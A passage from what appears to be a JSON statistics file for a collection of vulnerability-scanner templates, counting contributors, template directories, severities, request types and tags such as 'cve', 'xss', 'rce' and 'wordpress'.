[luqiih](https://github.com/luqiih)","count":1},{"name":"mah3sec_","count":1},{"name":"stupidfish","count":1},{"name":"fq_hsu","count":1},{"name":"schniggie","count":1},{"name":"mesaglio","count":1},{"name":"mrcl0wnlab","count":1},{"name":"chron0x","count":1},{"name":"fopina","count":1},{"name":"f1she3","count":1},{"name":"nytr0gen","count":1},{"name":"flag007","count":1},{"name":"xshuden","count":1},{"name":"h4kux","count":1},{"name":"alevsk","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"compr00t","count":1},{"name":"1nf1n7y","count":1},{"name":"th3.d1p4k","count":1},{"name":"jrolf","count":1},{"name":"tea","count":1},{"name":"toufik-airane","count":1},{"name":"0xh7ml","count":1},{"name":"anon-artist","count":1},{"name":"0xtavian","count":1},{"name":"_c0wb0y_","count":1},{"name":"justmumu","count":1},{"name":"jcockhren","count":1},{"name":"alexrydzak","count":1},{"name":"elouhi","count":1},{"name":"zandros0","count":1},{"name":"sicksec","count":1},{"name":"shockwave","count":1},{"name":"nielsing","count":1},{"name":"elmahdi","count":1},{"name":"2rs3c","count":1},{"name":"imhunterand","count":1},{"name":"wabafet","count":1},{"name":"ldionmarcil","count":1},{"name":"mantissts","count":1},{"name":"piyushchhiroliya","count":1},{"name":"evan rubinstien","count":1},{"name":"b0yd","count":1},{"name":"furkansenan","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"dievus","count":1},{"name":"shiar","count":1},{"name":"hexcat","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"act1on3","count":1},{"name":"alex","count":1},{"name":"vinit989","count":1},{"name":"juicypotato1","count":1},{"name":"tim_koopmans","count":1},{"name":"harshinsecurity","count":1},{"name":"open-sec","count":1},{"name":"rodnt","count":1},{"name":"w0tx","count":1},{"name":"apt-mirror","count":1},{"name":"pjborah","count":1},{"name":"kr1shna4garwal","count":1},{"name":"pratik khalane","count":1},{"name":"dhiyaneshdki","count":1},{"name":"ola456","count":1},{"name":"pascalheidmann","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"shifacyclewla","count":1},{"name":"petruknisme","count":1},{"name":"ahmed sherif","count":1},{"name":"mhdsamx","count":1},{"name":"miroslavsotak","count":1},{"name":"jteles","count":1},{"name":"bad5ect0r","count":1},{"name":"florianmaak","count":1},{"name":"ok_bye_now","count":1},{"name":"akash.c","count":1},{"name":"regala_","count":1},{"name":"charanrayudu","count":1},{"name":"y0no","count":1},{"name":"p-l-","count":1},{"name":"manuelbua","count":1},{"name":"tehtbl","count":1},{"name":"arm!tage","count":1},{"name":"yashanand155","count":1},{"name":"allenwest24","count":1},{"name":"deena","count":1},{"name":"hardik-rathod","count":1},{"name":"mubassirpatel","count":1},{"name":"luskabol","count":1},{"name":"kiks7","count":1},{"name":"berkdusunur","count":1},{"name":"vzamanillo","count":1},{"name":"_darrenmartyn","count":1},{"name":"willd96","count":1},{"name":"makyotox","count":1},{"name":"arr0way","count":1},{"name":"ilovebinbash","count":1},{"name":"megamansec","count":1},{"name":"djoevanka","count":1},{"name":"arall","count":1},{"name":"thevillagehacker","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"aresx","count":1},{"name":"luqman","count":1},{"name":"streetofhackerr007","count":1},{"name":"realexp3rt","count":1},{"name":"sinkettu","count":1},{"name":"yuansec","count":1},{"name":"x6263","count":1},{"name":"noamrathaus","count":1},{"name":"husain","count":1},{"name":"rschio","count":1},{"name":"jeya.seelan","count":1},{"name":"lark lab","count":1},{"name":"blckraven","count":1},{"name":"ransomsec","count":1},{"name":"5up3r541y4n","count":1},{"name":"prettyboyaaditya","count":1},{"name":"marcos_iaf","count":1},{"name":"kailashbohara","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"mass0ma","count":1},{"name":"patralos","count":1},{"name":"tirtha","count":1},{"name":"knassar702","count":1},{"name":"0ut0fb4nd","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"ringo","count":1},{"name":"nagli","count":1},{"name":"jbertman","count":1},{"name":"ph33rr","count":1},{"name":"noraj","count":1},{"name":"rojanrijal","count":1},{"name":"b0rn2r00t","count":1},{"name":"screamy","count":1},{"name":"rubina119","count":1},{"name":"aaronchen0","count":1},{"name":"osamahamad","count":1},{"name":"elder tao","count":1},{"name":"jiheon-dev","count":1},{"name":"droberson","count":1},{"name":"lingtren","count":1},{"name":"lixts","count":1},{"name":"clment cruchet","count":1},{"name":"igibanez","count":1},{"name":"iampritam","count":1},{"name":"orpheus","count":1},{"name":"pudsec","count":1},{"name":"udyz","count":1},{"name":"kaizensecurity","count":1},{"name":"exploitation","count":1},{"name":"d0rkerdevil","count":1},{"name":"secthebit","count":1},{"name":"theabhinavgaur","count":1},{"name":"coldfish","count":1},{"name":"httpvoid","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"yashgoti","count":1},{"name":"rivalsec","count":1},{"name":"liquidsec","count":1},{"name":"failopen","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"bughuntersurya","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"hanlaomo","count":1},{"name":"becivells","count":1},{"name":"ptonewreckin","count":1},{"name":"thelicato","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"tirtha_mandal","count":1},{"name":"narluin","count":1},{"name":"un-fmunozs","count":1},{"name":"amanrawat","count":1},{"name":"dale clarke","count":1},{"name":"remi gascou (podalirius)","count":1}],"directory":[{"name":"cves","count":1529},{"name":"exposed-panels","count":782},{"name":"vulnerabilities","count":520},{"name":"misconfiguration","count":361},{"name":"technologies","count":322},{"name":"exposures","count":308},{"name":"token-spray","count":236},{"name":"workflows","count":190},{"name":"default-logins","count":116},{"name":"file","count":78},{"name":"takeovers","count":69},{"name":"network","count":63},{"name":"iot","count":41},{"name":"miscellaneous","count":25},{"name":"cnvd","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1671},{"name":"high","count":1152},{"name":"medium","count":837},{"name":"critical","count":552},{"name":"low","count":281},{"name":"unknown","count":25}],"types":[{"name":"http","count":4330},{"name":"file","count":78},{"name":"network","count":77},{"name":"dns","count":17}]} +{"tags":[{"name":"cve","count":1575},{"name":"panel","count":803},{"name":"wordpress","count":684},{"name":"edb","count":583},{"name":"wp-plugin","count":579},{"name":"exposure","count":573},{"name":"tech","count":567},{"name":"xss","count":548},{"name":"lfi","count":522},{"name":"cve2021","count":375},{"name":"rce","count":352},{"name":"packetstorm","count":294},{"name":"cve2022","count":283},{"name":"wpscan","count":268},{"name":"misconfig","count":242},{"name":"token-spray","count":237},{"name":"cve2020","count":224},{"name":"unauth","count":211},{"name":"wp","count":201},{"name":"top-200","count":200},{"name":"","count":195},{"name":"config","count":173},{"name":"kev","count":168},{"name":"cve2018","count":145},{"name":"default-login","count":139},{"name":"cve2019","count":138},{"name":"joomla","count":135},{"name":"iot","count":132},{"name":"apache","count":131},{"name":"oast","count":128},{"name":"sqli","count":126},{"name":"authenticated","count":124},{"name":"cve2010","count":111},{"name":"files","count":101},{"name":"top-100","count":100},{"name":"router","count":95},{"name":"redirect","count":91},{"name":"login","count":89},{"name":"network","count":88},{"name":"token","count":76},{"name":"devops","count":76},{"name":"ssrf","count":75},{"name":"takeover","count":74},{"name":"cve2017","count":71},{"name":"auth-bypass","count":69},{"name":"cms","count":67},{"name":"file","count":66},{"name":"install","count":63},{"name":"oracle","count":63},{"name":"intrusive","count":60},{"name":"seclists","count":58},{"name":"disclosure","count":57},{"name":"oss","count":52},{"name":"cisco","count":50},{"name":"cve2016","count":49},{"name":"google","count":48},{"name":"fileupload","count":47},{"name":"cve2015","count":47},{"name":"adobe","count":45},{"name":"aem","count":42},{"name":"logs","count":42},{"name":"cve2014","count":41},{"name":"plugin","count":41},{"name":"hackerone","count":41},{"name":"debug","count":40},{"name":"vmware","count":39},{"name":"atlassian","count":38},{"name":"vulhub","count":38},{"name":"tenable","count":36},{"name":"springboot","count":35},{"name":"traversal","count":35},{"name":"injection","count":34},{"name":"jira","count":32},{"name":"huntr","count":32},{"name":"listing","count":31},{"name":"generic","count":31},{"name":"kubernetes","count":31},{"name":"dns","count":27},{"name":"log4j","count":26},{"name":"microsoft","count":25},{"name":"aws","count":25},{"name":"misc","count":25},{"name":"sap","count":25},{"name":"cnvd","count":25},{"name":"jndi","count":23},{"name":"proxy","count":23},{"name":"fuzz","count":22},{"name":"php","count":22},{"name":"manageengine","count":22},{"name":"zoho","count":22},{"name":"cve2012","count":21},{"name":"api","count":21},{"name":"wp-theme","count":21},{"name":"cicd","count":20},{"name":"deserialization","count":20},{"name":"k8s","count":20},{"name":"cloud","count":20},{"name":"weblogic","count":20},{"name":"tomcat","count":19},{"name":"ibm","count":19},{"name":"camera","count":19},{"name":"dlink","count":18},{"name":"gitlab","count":18},{"name":"wavlink","count":17},{"name":"service","count":17},{"name":"struts","count":17},{"name":"firewall","count":17},{"name":"jenkins","count":17},{"name":"ftp","count":17},{"name":"msf","count":16},{"name":"printer","count":16},{"name":"fortinet","count":15},{"name":"amazon","count":15},{"name":"cve2011","count":15},{"name":"cve2009","count":15},{"name":"xxe","count":15},{"name":"nginx","count":15},{"name":"android","count":14},{"name":"lfr","count":14},{"name":"domainmod","count":14},{"name":"java","count":14},{"name":"status","count":14},{"name":"hp","count":14},{"name":"confluence","count":13},{"name":"cve2008","count":13},{"name":"woocommerce","count":13},{"name":"abstractapi","count":13},{"name":"magento","count":13},{"name":"cve2013","count":13},{"name":"backup","count":12},{"name":"ruijie","count":12},{"name":"netgear","count":12},{"name":"microweber","count":12},{"name":"vpn","count":12},{"name":"fortigate","count":12},{"name":"rails","count":12},{"name":"graphql","count":12},{"name":"drupal","count":12},{"name":"github","count":12},{"name":"zyxel","count":12},{"name":"netsweeper","count":12},{"name":"webserver","count":11},{"name":"mail","count":11},{"name":"cnvd2021","count":11},{"name":"cisa","count":11},{"name":"ssl","count":11},{"name":"backdoor","count":11},{"name":"airflow","count":11},{"name":"azure","count":11},{"name":"dell","count":10},{"name":"admin","count":10},{"name":"ruby","count":10},{"name":"spring","count":10},{"name":"jolokia","count":10},{"name":"glpi","count":10},{"name":"grafana","count":10},{"name":"git","count":10},{"name":"coldfusion","count":10},{"name":"laravel","count":10},{"name":"django","count":10},{"name":"vcenter","count":9},{"name":"wso2","count":9},{"name":"ssti","count":9},{"name":"iis","count":9},{"name":"prometheus","count":9},{"name":"zimbra","count":9},{"name":"kube","count":9},{"name":"windows","count":9},{"name":"npm","count":9},{"name":"ssh","count":9},{"name":"zabbix","count":9},{"name":"fastjson","count":9},{"name":"sonicwall","count":9},{"name":"phpmyadmin","count":9},{"name":"dedecms","count":9},{"name":"versa","count":9},{"name":"scada","count":9},{"name":"solr","count":8},{"name":"metadata","count":8},{"name":"db","count":8},{"name":"symfony","count":8},{"name":"jboss","count":8},{"name":"cisco-switch","count":8},{"name":"audit","count":8},{"name":"docker","count":8},{"name":"config-audit","count":8},{"name":"citrix","count":8},{"name":"hms","count":8},{"name":"recon","count":8},{"name":"elasticsearch","count":8},{"name":"solarview","count":8},{"name":"bucket","count":8},{"name":"mirai","count":8},{"name":"kafka","count":8},{"name":"firebase","count":8},{"name":"auth","count":8},{"name":"jetbrains","count":8},{"name":"headless","count":8},{"name":"exchange","count":7},{"name":"cnvd2020","count":7},{"name":"squirrelmail","count":7},{"name":"emerge","count":7},{"name":"seeyon","count":7},{"name":"blind","count":7},{"name":"opencats","count":7},{"name":"icewarp","count":7},{"name":"ofbiz","count":7},{"name":"python","count":7},{"name":"crlf","count":7},{"name":"druid","count":7},{"name":"maps","count":7},{"name":"go","count":7},{"name":"detect","count":7},{"name":"nodejs","count":7},{"name":"cache","count":7},{"name":"thinkphp","count":7},{"name":"ognl","count":7},{"name":"samsung","count":7},{"name":"huawei","count":6},{"name":"openvpn","count":6},{"name":"jamf","count":6},{"name":"magmi","count":6},{"name":"filemanager","count":6},{"name":"lucee","count":6},{"name":"redis","count":6},{"name":"sitecore","count":6},{"name":"elfinder","count":6},{"name":"enum","count":6},{"name":"cobbler","count":6},{"name":"keycloak","count":6},{"name":"bigip","count":6},{"name":"websphere","count":6},{"name":"liferay","count":6},{"name":"activemq","count":6},{"name":"slack","count":6},{"name":"setup","count":6},{"name":"ecology","count":6},{"name":"jetty","count":6},{"name":"kubelet","count":6},{"name":"node","count":6},{"name":"zhiyuan","count":6},{"name":"smtp","count":6},{"name":"database","count":6},{"name":"opensis","count":6},{"name":"vms","count":6},{"name":"bypass","count":6},{"name":"artica","count":6},{"name":"rconfig","count":6},{"name":"moodle","count":6},{"name":"fpd","count":6},{"name":"microstrategy","count":6},{"name":"carrental","count":5},{"name":"vbulletin","count":5},{"name":"s3","count":5},{"name":"minio","count":5},{"name":"scan","count":5},{"name":"gocd","count":5},{"name":"nagios","count":5},{"name":"plesk","count":5},{"name":"apisix","count":5},{"name":"prestashop","count":5},{"name":"fatpipe","count":5},{"name":"leak","count":5},{"name":"mongodb","count":5},{"name":"rfi","count":5},{"name":"rseenet","count":5},{"name":"elastic","count":5},{"name":"awstats","count":5},{"name":"metinfo","count":5},{"name":"ec2","count":5},{"name":"cockpit","count":5},{"name":"alibaba","count":5},{"name":"cacti","count":5},{"name":"storage","count":5},{"name":"parallels","count":5},{"name":"circarlife","count":5},{"name":"74cms","count":5},{"name":"gogs","count":5},{"name":"error","count":5},{"name":"firmware","count":5},{"name":"fortios","count":5},{"name":"symantec","count":5},{"name":"solarwinds","count":5},{"name":"strapi","count":5},{"name":"avideo","count":5},{"name":"tikiwiki","count":4},{"name":"mautic","count":4},{"name":"dropbear","count":4},{"name":"telesquare","count":4},{"name":"sendgrid","count":4},{"name":"hpe","count":4},{"name":"sangfor","count":4},{"name":"sophos","count":4},{"name":"vrealize","count":4},{"name":"hongdian","count":4},{"name":"flink","count":4},{"name":"beyondtrust","count":4},{"name":"thinkcmf","count":4},{"name":"hybris","count":4},{"name":"hashicorp","count":4},{"name":"telerik","count":4},{"name":"typo3","count":4},{"name":"hoteldruid","count":4},{"name":"photo","count":4},{"name":"redmine","count":4},{"name":"adminer","count":4},{"name":"concrete","count":4},{"name":"jellyfin","count":4},{"name":"candidats","count":4},{"name":"spark","count":4},{"name":"zend","count":4},{"name":"couchdb","count":4},{"name":"sonarqube","count":4},{"name":"console","count":4},{"name":"roxy","count":4},{"name":"horde","count":4},{"name":"gitea","count":4},{"name":"royalevent","count":4},{"name":"gnuboard","count":4},{"name":"panos","count":4},{"name":"cve2007","count":4},{"name":"httpserver","count":4},{"name":"zte","count":4},{"name":"stripe","count":4},{"name":"paypal","count":4},{"name":"geoserver","count":4},{"name":"ems","count":4},{"name":"akamai","count":4},{"name":"asp","count":4},{"name":"prtg","count":4},{"name":"voip","count":4},{"name":"digitalocean","count":4},{"name":"rabbitmq","count":4},{"name":"kibana","count":4},{"name":"nexus","count":4},{"name":"log","count":4},{"name":"kevinlab","count":4},{"name":"aspose","count":4},{"name":"bmc","count":4},{"name":"puppet","count":4},{"name":"umbraco","count":4},{"name":"mikrotik","count":4},{"name":"xmlrpc","count":4},{"name":"tenda","count":4},{"name":"nosqli","count":4},{"name":"wcs","count":4},{"name":"cnvd2019","count":4},{"name":"springcloud","count":4},{"name":"kentico","count":4},{"name":"resin","count":4},{"name":"mailchimp","count":4},{"name":"ruckus","count":4},{"name":"artifactory","count":4},{"name":"microfocus","count":4},{"name":"phpinfo","count":4},{"name":"sql","count":4},{"name":"openemr","count":4},{"name":"axigen","count":4},{"name":"yeswiki","count":4},{"name":"phppgadmin","count":4},{"name":"caucho","count":4},{"name":"linkerd","count":4},{"name":"terramaster","count":4},{"name":"postmessage","count":4},{"name":"search","count":4},{"name":"hikvision","count":4},{"name":"oa","count":4},{"name":"oauth","count":4},{"name":"ampache","count":4},{"name":"trixbox","count":3},{"name":"openbmcs","count":3},{"name":"httpbin","count":3},{"name":"bitbucket","count":3},{"name":"dreambox","count":3},{"name":"gradle","count":3},{"name":"sharepoint","count":3},{"name":"square","count":3},{"name":"fuelcms","count":3},{"name":"mcafee","count":3},{"name":"panabit","count":3},{"name":"glassfish","count":3},{"name":"lotus","count":3},{"name":"graph","count":3},{"name":"nortek","count":3},{"name":"jeesns","count":3},{"name":"digitalrebar","count":3},{"name":"fanruan","count":3},{"name":"dolibarr","count":3},{"name":"webcam","count":3},{"name":"blockchain","count":3},{"name":"finecms","count":3},{"name":"splunk","count":3},{"name":"metabase","count":3},{"name":"jupyter","count":3},{"name":"superadmin","count":3},{"name":"lansweeper","count":3},{"name":"bitrix","count":3},{"name":"getsimple","count":3},{"name":"harbor","count":3},{"name":"eshop","count":3},{"name":"netlify","count":3},{"name":"facebook","count":3},{"name":"subrion","count":3},{"name":"grav","count":3},{"name":"pega","count":3},{"name":"unifi","count":3},{"name":"rocketchat","count":3},{"name":"atom","count":3},{"name":"movable","count":3},{"name":"sftp","count":3},{"name":"influxdb","count":3},{"name":"modem","count":3},{"name":"openstack","count":3},{"name":"selea","count":3},{"name":"key","count":3},{"name":"webmail","count":3},{"name":"ebs","count":3},{"name":"geowebserver","count":3},{"name":"synology","count":3},{"name":"ampps","count":3},{"name":"webmin","count":3},{"name":"aptus","count":3},{"name":"openam","count":3},{"name":"labkey","count":3},{"name":"octobercms","count":3},{"name":"nuuo","count":3},{"name":"dom","count":3},{"name":"trendnet","count":3},{"name":"samba","count":3},{"name":"netdata","count":3},{"name":"smb","count":3},{"name":"dzzoffice","count":3},{"name":"payara","count":3},{"name":"sugarcrm","count":3},{"name":"httpd","count":3},{"name":"r-seenet","count":3},{"name":"intercom","count":3},{"name":"rackn","count":3},{"name":"targa","count":3},{"name":"totolink","count":3},{"name":"processwire","count":3},{"name":"redash","count":3},{"name":"tableau","count":3},{"name":"openfire","count":3},{"name":"wordfence","count":3},{"name":"circleci","count":3},{"name":"cloudflare","count":3},{"name":"mobileiron","count":3},{"name":"jfrog","count":3},{"name":"linksys","count":3},{"name":"yonyou","count":3},{"name":"axis","count":3},{"name":"actuator","count":3},{"name":"pentaho","count":3},{"name":"rlm","count":3},{"name":"thinfinity","count":3},{"name":"bruteforce","count":3},{"name":"steve","count":3},{"name":"selenium","count":3},{"name":"flexvnf","count":3},{"name":"carel","count":3},{"name":"epson","count":3},{"name":"codeigniter","count":3},{"name":"odoo","count":3},{"name":"consul","count":3},{"name":"clusterengine","count":3},{"name":"nacos","count":3},{"name":"kkfileview","count":3},{"name":"bigant","count":3},{"name":"kfm","count":3},{"name":"matrix","count":3},{"name":"express","count":3},{"name":"seagate","count":3},{"name":"pip","count":3},{"name":"messaging","count":3},{"name":"empirecms","count":3},{"name":"hsphere","count":3},{"name":"teamcity","count":3},{"name":"ivanti","count":3},{"name":"servicenow","count":3},{"name":"centos","count":3},{"name":"mongo","count":3},{"name":"goanywhere","count":3},{"name":"fileman","count":3},{"name":"mantisbt","count":3},{"name":"kingsoft","count":3},{"name":"heroku","count":3},{"name":"graylog","count":3},{"name":"pfsense","count":3},{"name":"axis2","count":3},{"name":"mysql","count":3},{"name":"weiphp","count":3},{"name":"thruk","count":3},{"name":"elementor","count":3},{"name":"proftpd","count":3},{"name":"zeroshell","count":3},{"name":"qnap","count":3},{"name":"globalprotect","count":3},{"name":"sentry","count":3},{"name":"3cx","count":3},{"name":"telnet","count":3},{"name":"voipmonitor","count":3},{"name":"avtech","count":3},{"name":"cve2005","count":3},{"name":"buffalo","count":3},{"name":"webadmin","count":3},{"name":"dotcms","count":3},{"name":"drawio","count":3},{"name":"ansible","count":3},{"name":"overflow","count":2},{"name":"pypiserver","count":2},{"name":"akkadian","count":2},{"name":"rancher","count":2},{"name":"nasos","count":2},{"name":"chamilo","count":2},{"name":"default-page","count":2},{"name":"sass","count":2},{"name":"eko","count":2},{"name":"jsf","count":2},{"name":"sony","count":2},{"name":"dubbo","count":2},{"name":"aviatrix","count":2},{"name":"shenyu","count":2},{"name":"etherpad","count":2},{"name":"gitblit","count":2},{"name":"openresty","count":2},{"name":"traefik","count":2},{"name":"yapi","count":2},{"name":"imap","count":2},{"name":"pulse","count":2},{"name":"alfresco","count":2},{"name":"opencart","count":2},{"name":"bomgar","count":2},{"name":"arcgis","count":2},{"name":"kanboard","count":2},{"name":"books","count":2},{"name":"fortiweb","count":2},{"name":"fortimail","count":2},{"name":"cloudinary","count":2},{"name":"gateway","count":2},{"name":"xiaomi","count":2},{"name":"wwbn","count":2},{"name":"tongda","count":2},{"name":"blesta","count":2},{"name":"embed","count":2},{"name":"acunetix","count":2},{"name":"homematic","count":2},{"name":"mbean","count":2},{"name":"hadoop","count":2},{"name":"submitty","count":2},{"name":"dashboard","count":2},{"name":"xnat","count":2},{"name":"globaldomains","count":2},{"name":"scriptcase","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"sqlite","count":2},{"name":"avaya","count":2},{"name":"secret","count":2},{"name":"espeasy","count":2},{"name":"wapples","count":2},{"name":"sysaid","count":2},{"name":"pam","count":2},{"name":"puppetdb","count":2},{"name":"zzzcms","count":2},{"name":"projectsend","count":2},{"name":"sitemap","count":2},{"name":"apollo","count":2},{"name":"domxss","count":2},{"name":"horizon","count":2},{"name":"loytec","count":2},{"name":"reolink","count":2},{"name":"servicedesk","count":2},{"name":"terraform","count":2},{"name":"metersphere","count":2},{"name":"portal","count":2},{"name":"ucmdb","count":2},{"name":"maian","count":2},{"name":"matomo","count":2},{"name":"ranger","count":2},{"name":"avantfax","count":2},{"name":"netflix","count":2},{"name":"tornado","count":2},{"name":"cocoon","count":2},{"name":"fiori","count":2},{"name":"frp","count":2},{"name":"qihang","count":2},{"name":"nextcloud","count":2},{"name":"ad","count":2},{"name":"eprints","count":2},{"name":"viewpoint","count":2},{"name":"emqx","count":2},{"name":"hubspot","count":2},{"name":"ilo","count":2},{"name":"neos","count":2},{"name":"karaf","count":2},{"name":"piwigo","count":2},{"name":"redhat","count":2},{"name":"apple","count":2},{"name":"j2ee","count":2},{"name":"inspur","count":2},{"name":"ebook","count":2},{"name":"adiscon","count":2},{"name":"tplink","count":2},{"name":"lenovo","count":2},{"name":"mybb","count":2},{"name":"guacamole","count":2},{"name":"avada","count":2},{"name":"teampass","count":2},{"name":"landesk","count":2},{"name":"ubnt","count":2},{"name":"xml","count":2},{"name":"veeam","count":2},{"name":"clansphere","count":2},{"name":"weather","count":2},{"name":"commax","count":2},{"name":"kong","count":2},{"name":"hiveos","count":2},{"name":"oidc","count":2},{"name":"idor","count":2},{"name":"flatpress","count":2},{"name":"javascript","count":2},{"name":"dotnet","count":2},{"name":"zzcms","count":2},{"name":"myfactory","count":2},{"name":"lantronix","count":2},{"name":"hospital","count":2},{"name":"discourse","count":2},{"name":"frontpage","count":2},{"name":"mida","count":2},{"name":"xxljob","count":2},{"name":"linux","count":2},{"name":"gryphon","count":2},{"name":"forcepoint","count":2},{"name":"nps","count":2},{"name":"webuzo","count":2},{"name":"aerohive","count":2},{"name":"kiwitcms","count":2},{"name":"loqate","count":2},{"name":"wamp","count":2},{"name":"pagespeed","count":2},{"name":"linkedin","count":2},{"name":"wpqa","count":2},{"name":"rundeck","count":2},{"name":"wooyun","count":2},{"name":"supermicro","count":2},{"name":"eris","count":2},{"name":"zerof","count":2},{"name":"octoprint","count":2},{"name":"dotnetnuke","count":2},{"name":"clamav","count":2},{"name":"phpstorm","count":2},{"name":"itop","count":2},{"name":"netscaler","count":2},{"name":"aircube","count":2},{"name":"circontrol","count":2},{"name":"angular","count":2},{"name":"couchbase","count":2},{"name":"uwsgi","count":2},{"name":"osticket","count":2},{"name":"audiocodes","count":2},{"name":"temenos","count":2},{"name":"opsview","count":2},{"name":"appcms","count":2},{"name":"dvr","count":2},{"name":"dvwa","count":2},{"name":"eyesofnetwork","count":2},{"name":"codemeter","count":2},{"name":"rackstation","count":2},{"name":"orchid","count":2},{"name":"otobo","count":2},{"name":"tiny","count":2},{"name":"azkaban","count":2},{"name":"plastic","count":2},{"name":"bash","count":2},{"name":"ixcache","count":2},{"name":"alienvault","count":2},{"name":"tileserver","count":2},{"name":"hasura","count":2},{"name":"synopsys","count":2},{"name":"favicon","count":2},{"name":"hue","count":2},{"name":"owncloud","count":2},{"name":"livehelperchat","count":2},{"name":"phpcollab","count":2},{"name":"backups","count":2},{"name":"pbootcms","count":2},{"name":"flir","count":2},{"name":"ericsson","count":2},{"name":"yii","count":2},{"name":"aruba","count":2},{"name":"ametys","count":2},{"name":"sniplets","count":2},{"name":"zblogphp","count":2},{"name":"xenmobile","count":2},{"name":"werkzeug","count":2},{"name":"f5","count":2},{"name":"rosariosis","count":2},{"name":"kettle","count":2},{"name":"netis","count":2},{"name":"owasp","count":2},{"name":"upload","count":2},{"name":"kkFileView","count":2},{"name":"syslog","count":2},{"name":"jmx","count":2},{"name":"text","count":2},{"name":"ldap","count":2},{"name":"twitter","count":2},{"name":"netsus","count":2},{"name":"svn","count":2},{"name":"gitbook","count":2},{"name":"middleware","count":2},{"name":"docs","count":2},{"name":"wuzhicms","count":2},{"name":"unisharp","count":2},{"name":"nextjs","count":2},{"name":"relatedposts","count":2},{"name":"seacms","count":2},{"name":"tasmota","count":2},{"name":"flightpath","count":2},{"name":"xoops","count":2},{"name":"glances","count":2},{"name":"wildfly","count":2},{"name":"checkpoint","count":2},{"name":"seowon","count":2},{"name":"code42","count":2},{"name":"showdoc","count":2},{"name":"ispy","count":2},{"name":"vidyo","count":2},{"name":"listserv","count":2},{"name":"rockmongo","count":2},{"name":"h3c","count":2},{"name":"xerox","count":2},{"name":"casdoor","count":2},{"name":"acrolinx","count":2},{"name":"dokuwiki","count":2},{"name":"sdwan","count":2},{"name":"kavita","count":2},{"name":"zms","count":2},{"name":"salesforce","count":2},{"name":"shellshock","count":2},{"name":"froxlor","count":2},{"name":"tapestry","count":2},{"name":"exacqvision","count":2},{"name":"dbeaver","count":2},{"name":"omnia","count":2},{"name":"livezilla","count":2},{"name":"idea","count":2},{"name":"password","count":2},{"name":"corebos","count":2},{"name":"dos","count":2},{"name":"graphite","count":2},{"name":"haproxy","count":2},{"name":"craftcms","count":2},{"name":"fastcgi","count":2},{"name":"cas","count":2},{"name":"seeddms","count":2},{"name":"superset","count":2},{"name":"lighttpd","count":2},{"name":"jquery","count":2},{"name":"emby","count":2},{"name":"jeedom","count":2},{"name":"ovirt","count":2},{"name":"sas","count":2},{"name":"iptime","count":2},{"name":"natshell","count":2},{"name":"pcoip","count":2},{"name":"ecoa","count":2},{"name":"readme","count":2},{"name":"xceedium","count":2},{"name":"ambari","count":2},{"name":"rstudio","count":2},{"name":"dlp","count":2},{"name":"virtualui","count":2},{"name":"workspaceone","count":2},{"name":"bigbluebutton","count":2},{"name":"contao","count":2},{"name":"motorola","count":2},{"name":"pmb","count":2},{"name":"skycaiji","count":2},{"name":"totemomail","count":2},{"name":"cgi","count":2},{"name":"hetzner","count":2},{"name":"javamelody","count":2},{"name":"sidekiq","count":2},{"name":"places","count":2},{"name":"watchguard","count":2},{"name":"swagger","count":2},{"name":"installer","count":2},{"name":"cyberoam","count":2},{"name":"impresscms","count":2},{"name":"xampp","count":2},{"name":"gophish","count":2},{"name":"kafdrop","count":2},{"name":"draytek","count":2},{"name":"gcp","count":2},{"name":"node-red-dashboard","count":2},{"name":"vscode","count":2},{"name":"intellian","count":2},{"name":"dynamicweb","count":2},{"name":"novnc","count":2},{"name":"pacsone","count":2},{"name":"waf","count":2},{"name":"apikey","count":2},{"name":"webpagetest","count":2},{"name":"openssh","count":2},{"name":"aqua","count":2},{"name":"virtua","count":2},{"name":"cve2006","count":2},{"name":"airtame","count":2},{"name":"opencpu","count":2},{"name":"tidb","count":2},{"name":"resourcespace","count":2},{"name":"cargo","count":2},{"name":"dataiku","count":2},{"name":"ghost","count":2},{"name":"netsparker","count":2},{"name":"qcubed","count":2},{"name":"conductor","count":2},{"name":"electron","count":2},{"name":"sourcecodester","count":2},{"name":"postgres","count":2},{"name":"prestshop","count":2},{"name":"highmail","count":2},{"name":"testrail","count":2},{"name":"jitsi","count":2},{"name":"hostheader-injection","count":2},{"name":"xsuite","count":2},{"name":"igs","count":2},{"name":"asus","count":2},{"name":"chyrp","count":2},{"name":"openwrt","count":2},{"name":"newrelic","count":2},{"name":"auerswald","count":2},{"name":"phpshowtime","count":2},{"name":"pgadmin","count":2},{"name":"saltstack","count":2},{"name":"apereo","count":2},{"name":"forum","count":2},{"name":"xweb500","count":2},{"name":"mailgun","count":2},{"name":"eventum","count":2},{"name":"lutron","count":2},{"name":"sequoiadb","count":2},{"name":"smartstore","count":2},{"name":"csrf","count":2},{"name":"accela","count":2},{"name":"chiyu","count":2},{"name":"nordex","count":2},{"name":"erxes","count":2},{"name":"bitly","count":2},{"name":"allied","count":2},{"name":"ilias","count":2},{"name":"webalizer","count":2},{"name":"cassandra","count":2},{"name":"gitlist","count":2},{"name":"gespage","count":2},{"name":"nuxeo","count":2},{"name":"pascom","count":2},{"name":"konga","count":2},{"name":"vigorconnect","count":2},{"name":"atmail","count":2},{"name":"zywall","count":2},{"name":"finger","count":2},{"name":"edgemax","count":1},{"name":"seopanel","count":1},{"name":"phalcon","count":1},{"name":"api-manager","count":1},{"name":"nimsoft","count":1},{"name":"shortcode","count":1},{"name":"cliniccases","count":1},{"name":"smartping","count":1},{"name":"gstorage","count":1},{"name":"formalms","count":1},{"name":"lokalise","count":1},{"name":"springframework","count":1},{"name":"give","count":1},{"name":"codestats","count":1},{"name":"employment","count":1},{"name":"cve2004","count":1},{"name":"objectinjection","count":1},{"name":"mrtg","count":1},{"name":"kindeditor","count":1},{"name":"websheets","count":1},{"name":"jinfornet","count":1},{"name":"smartgateway","c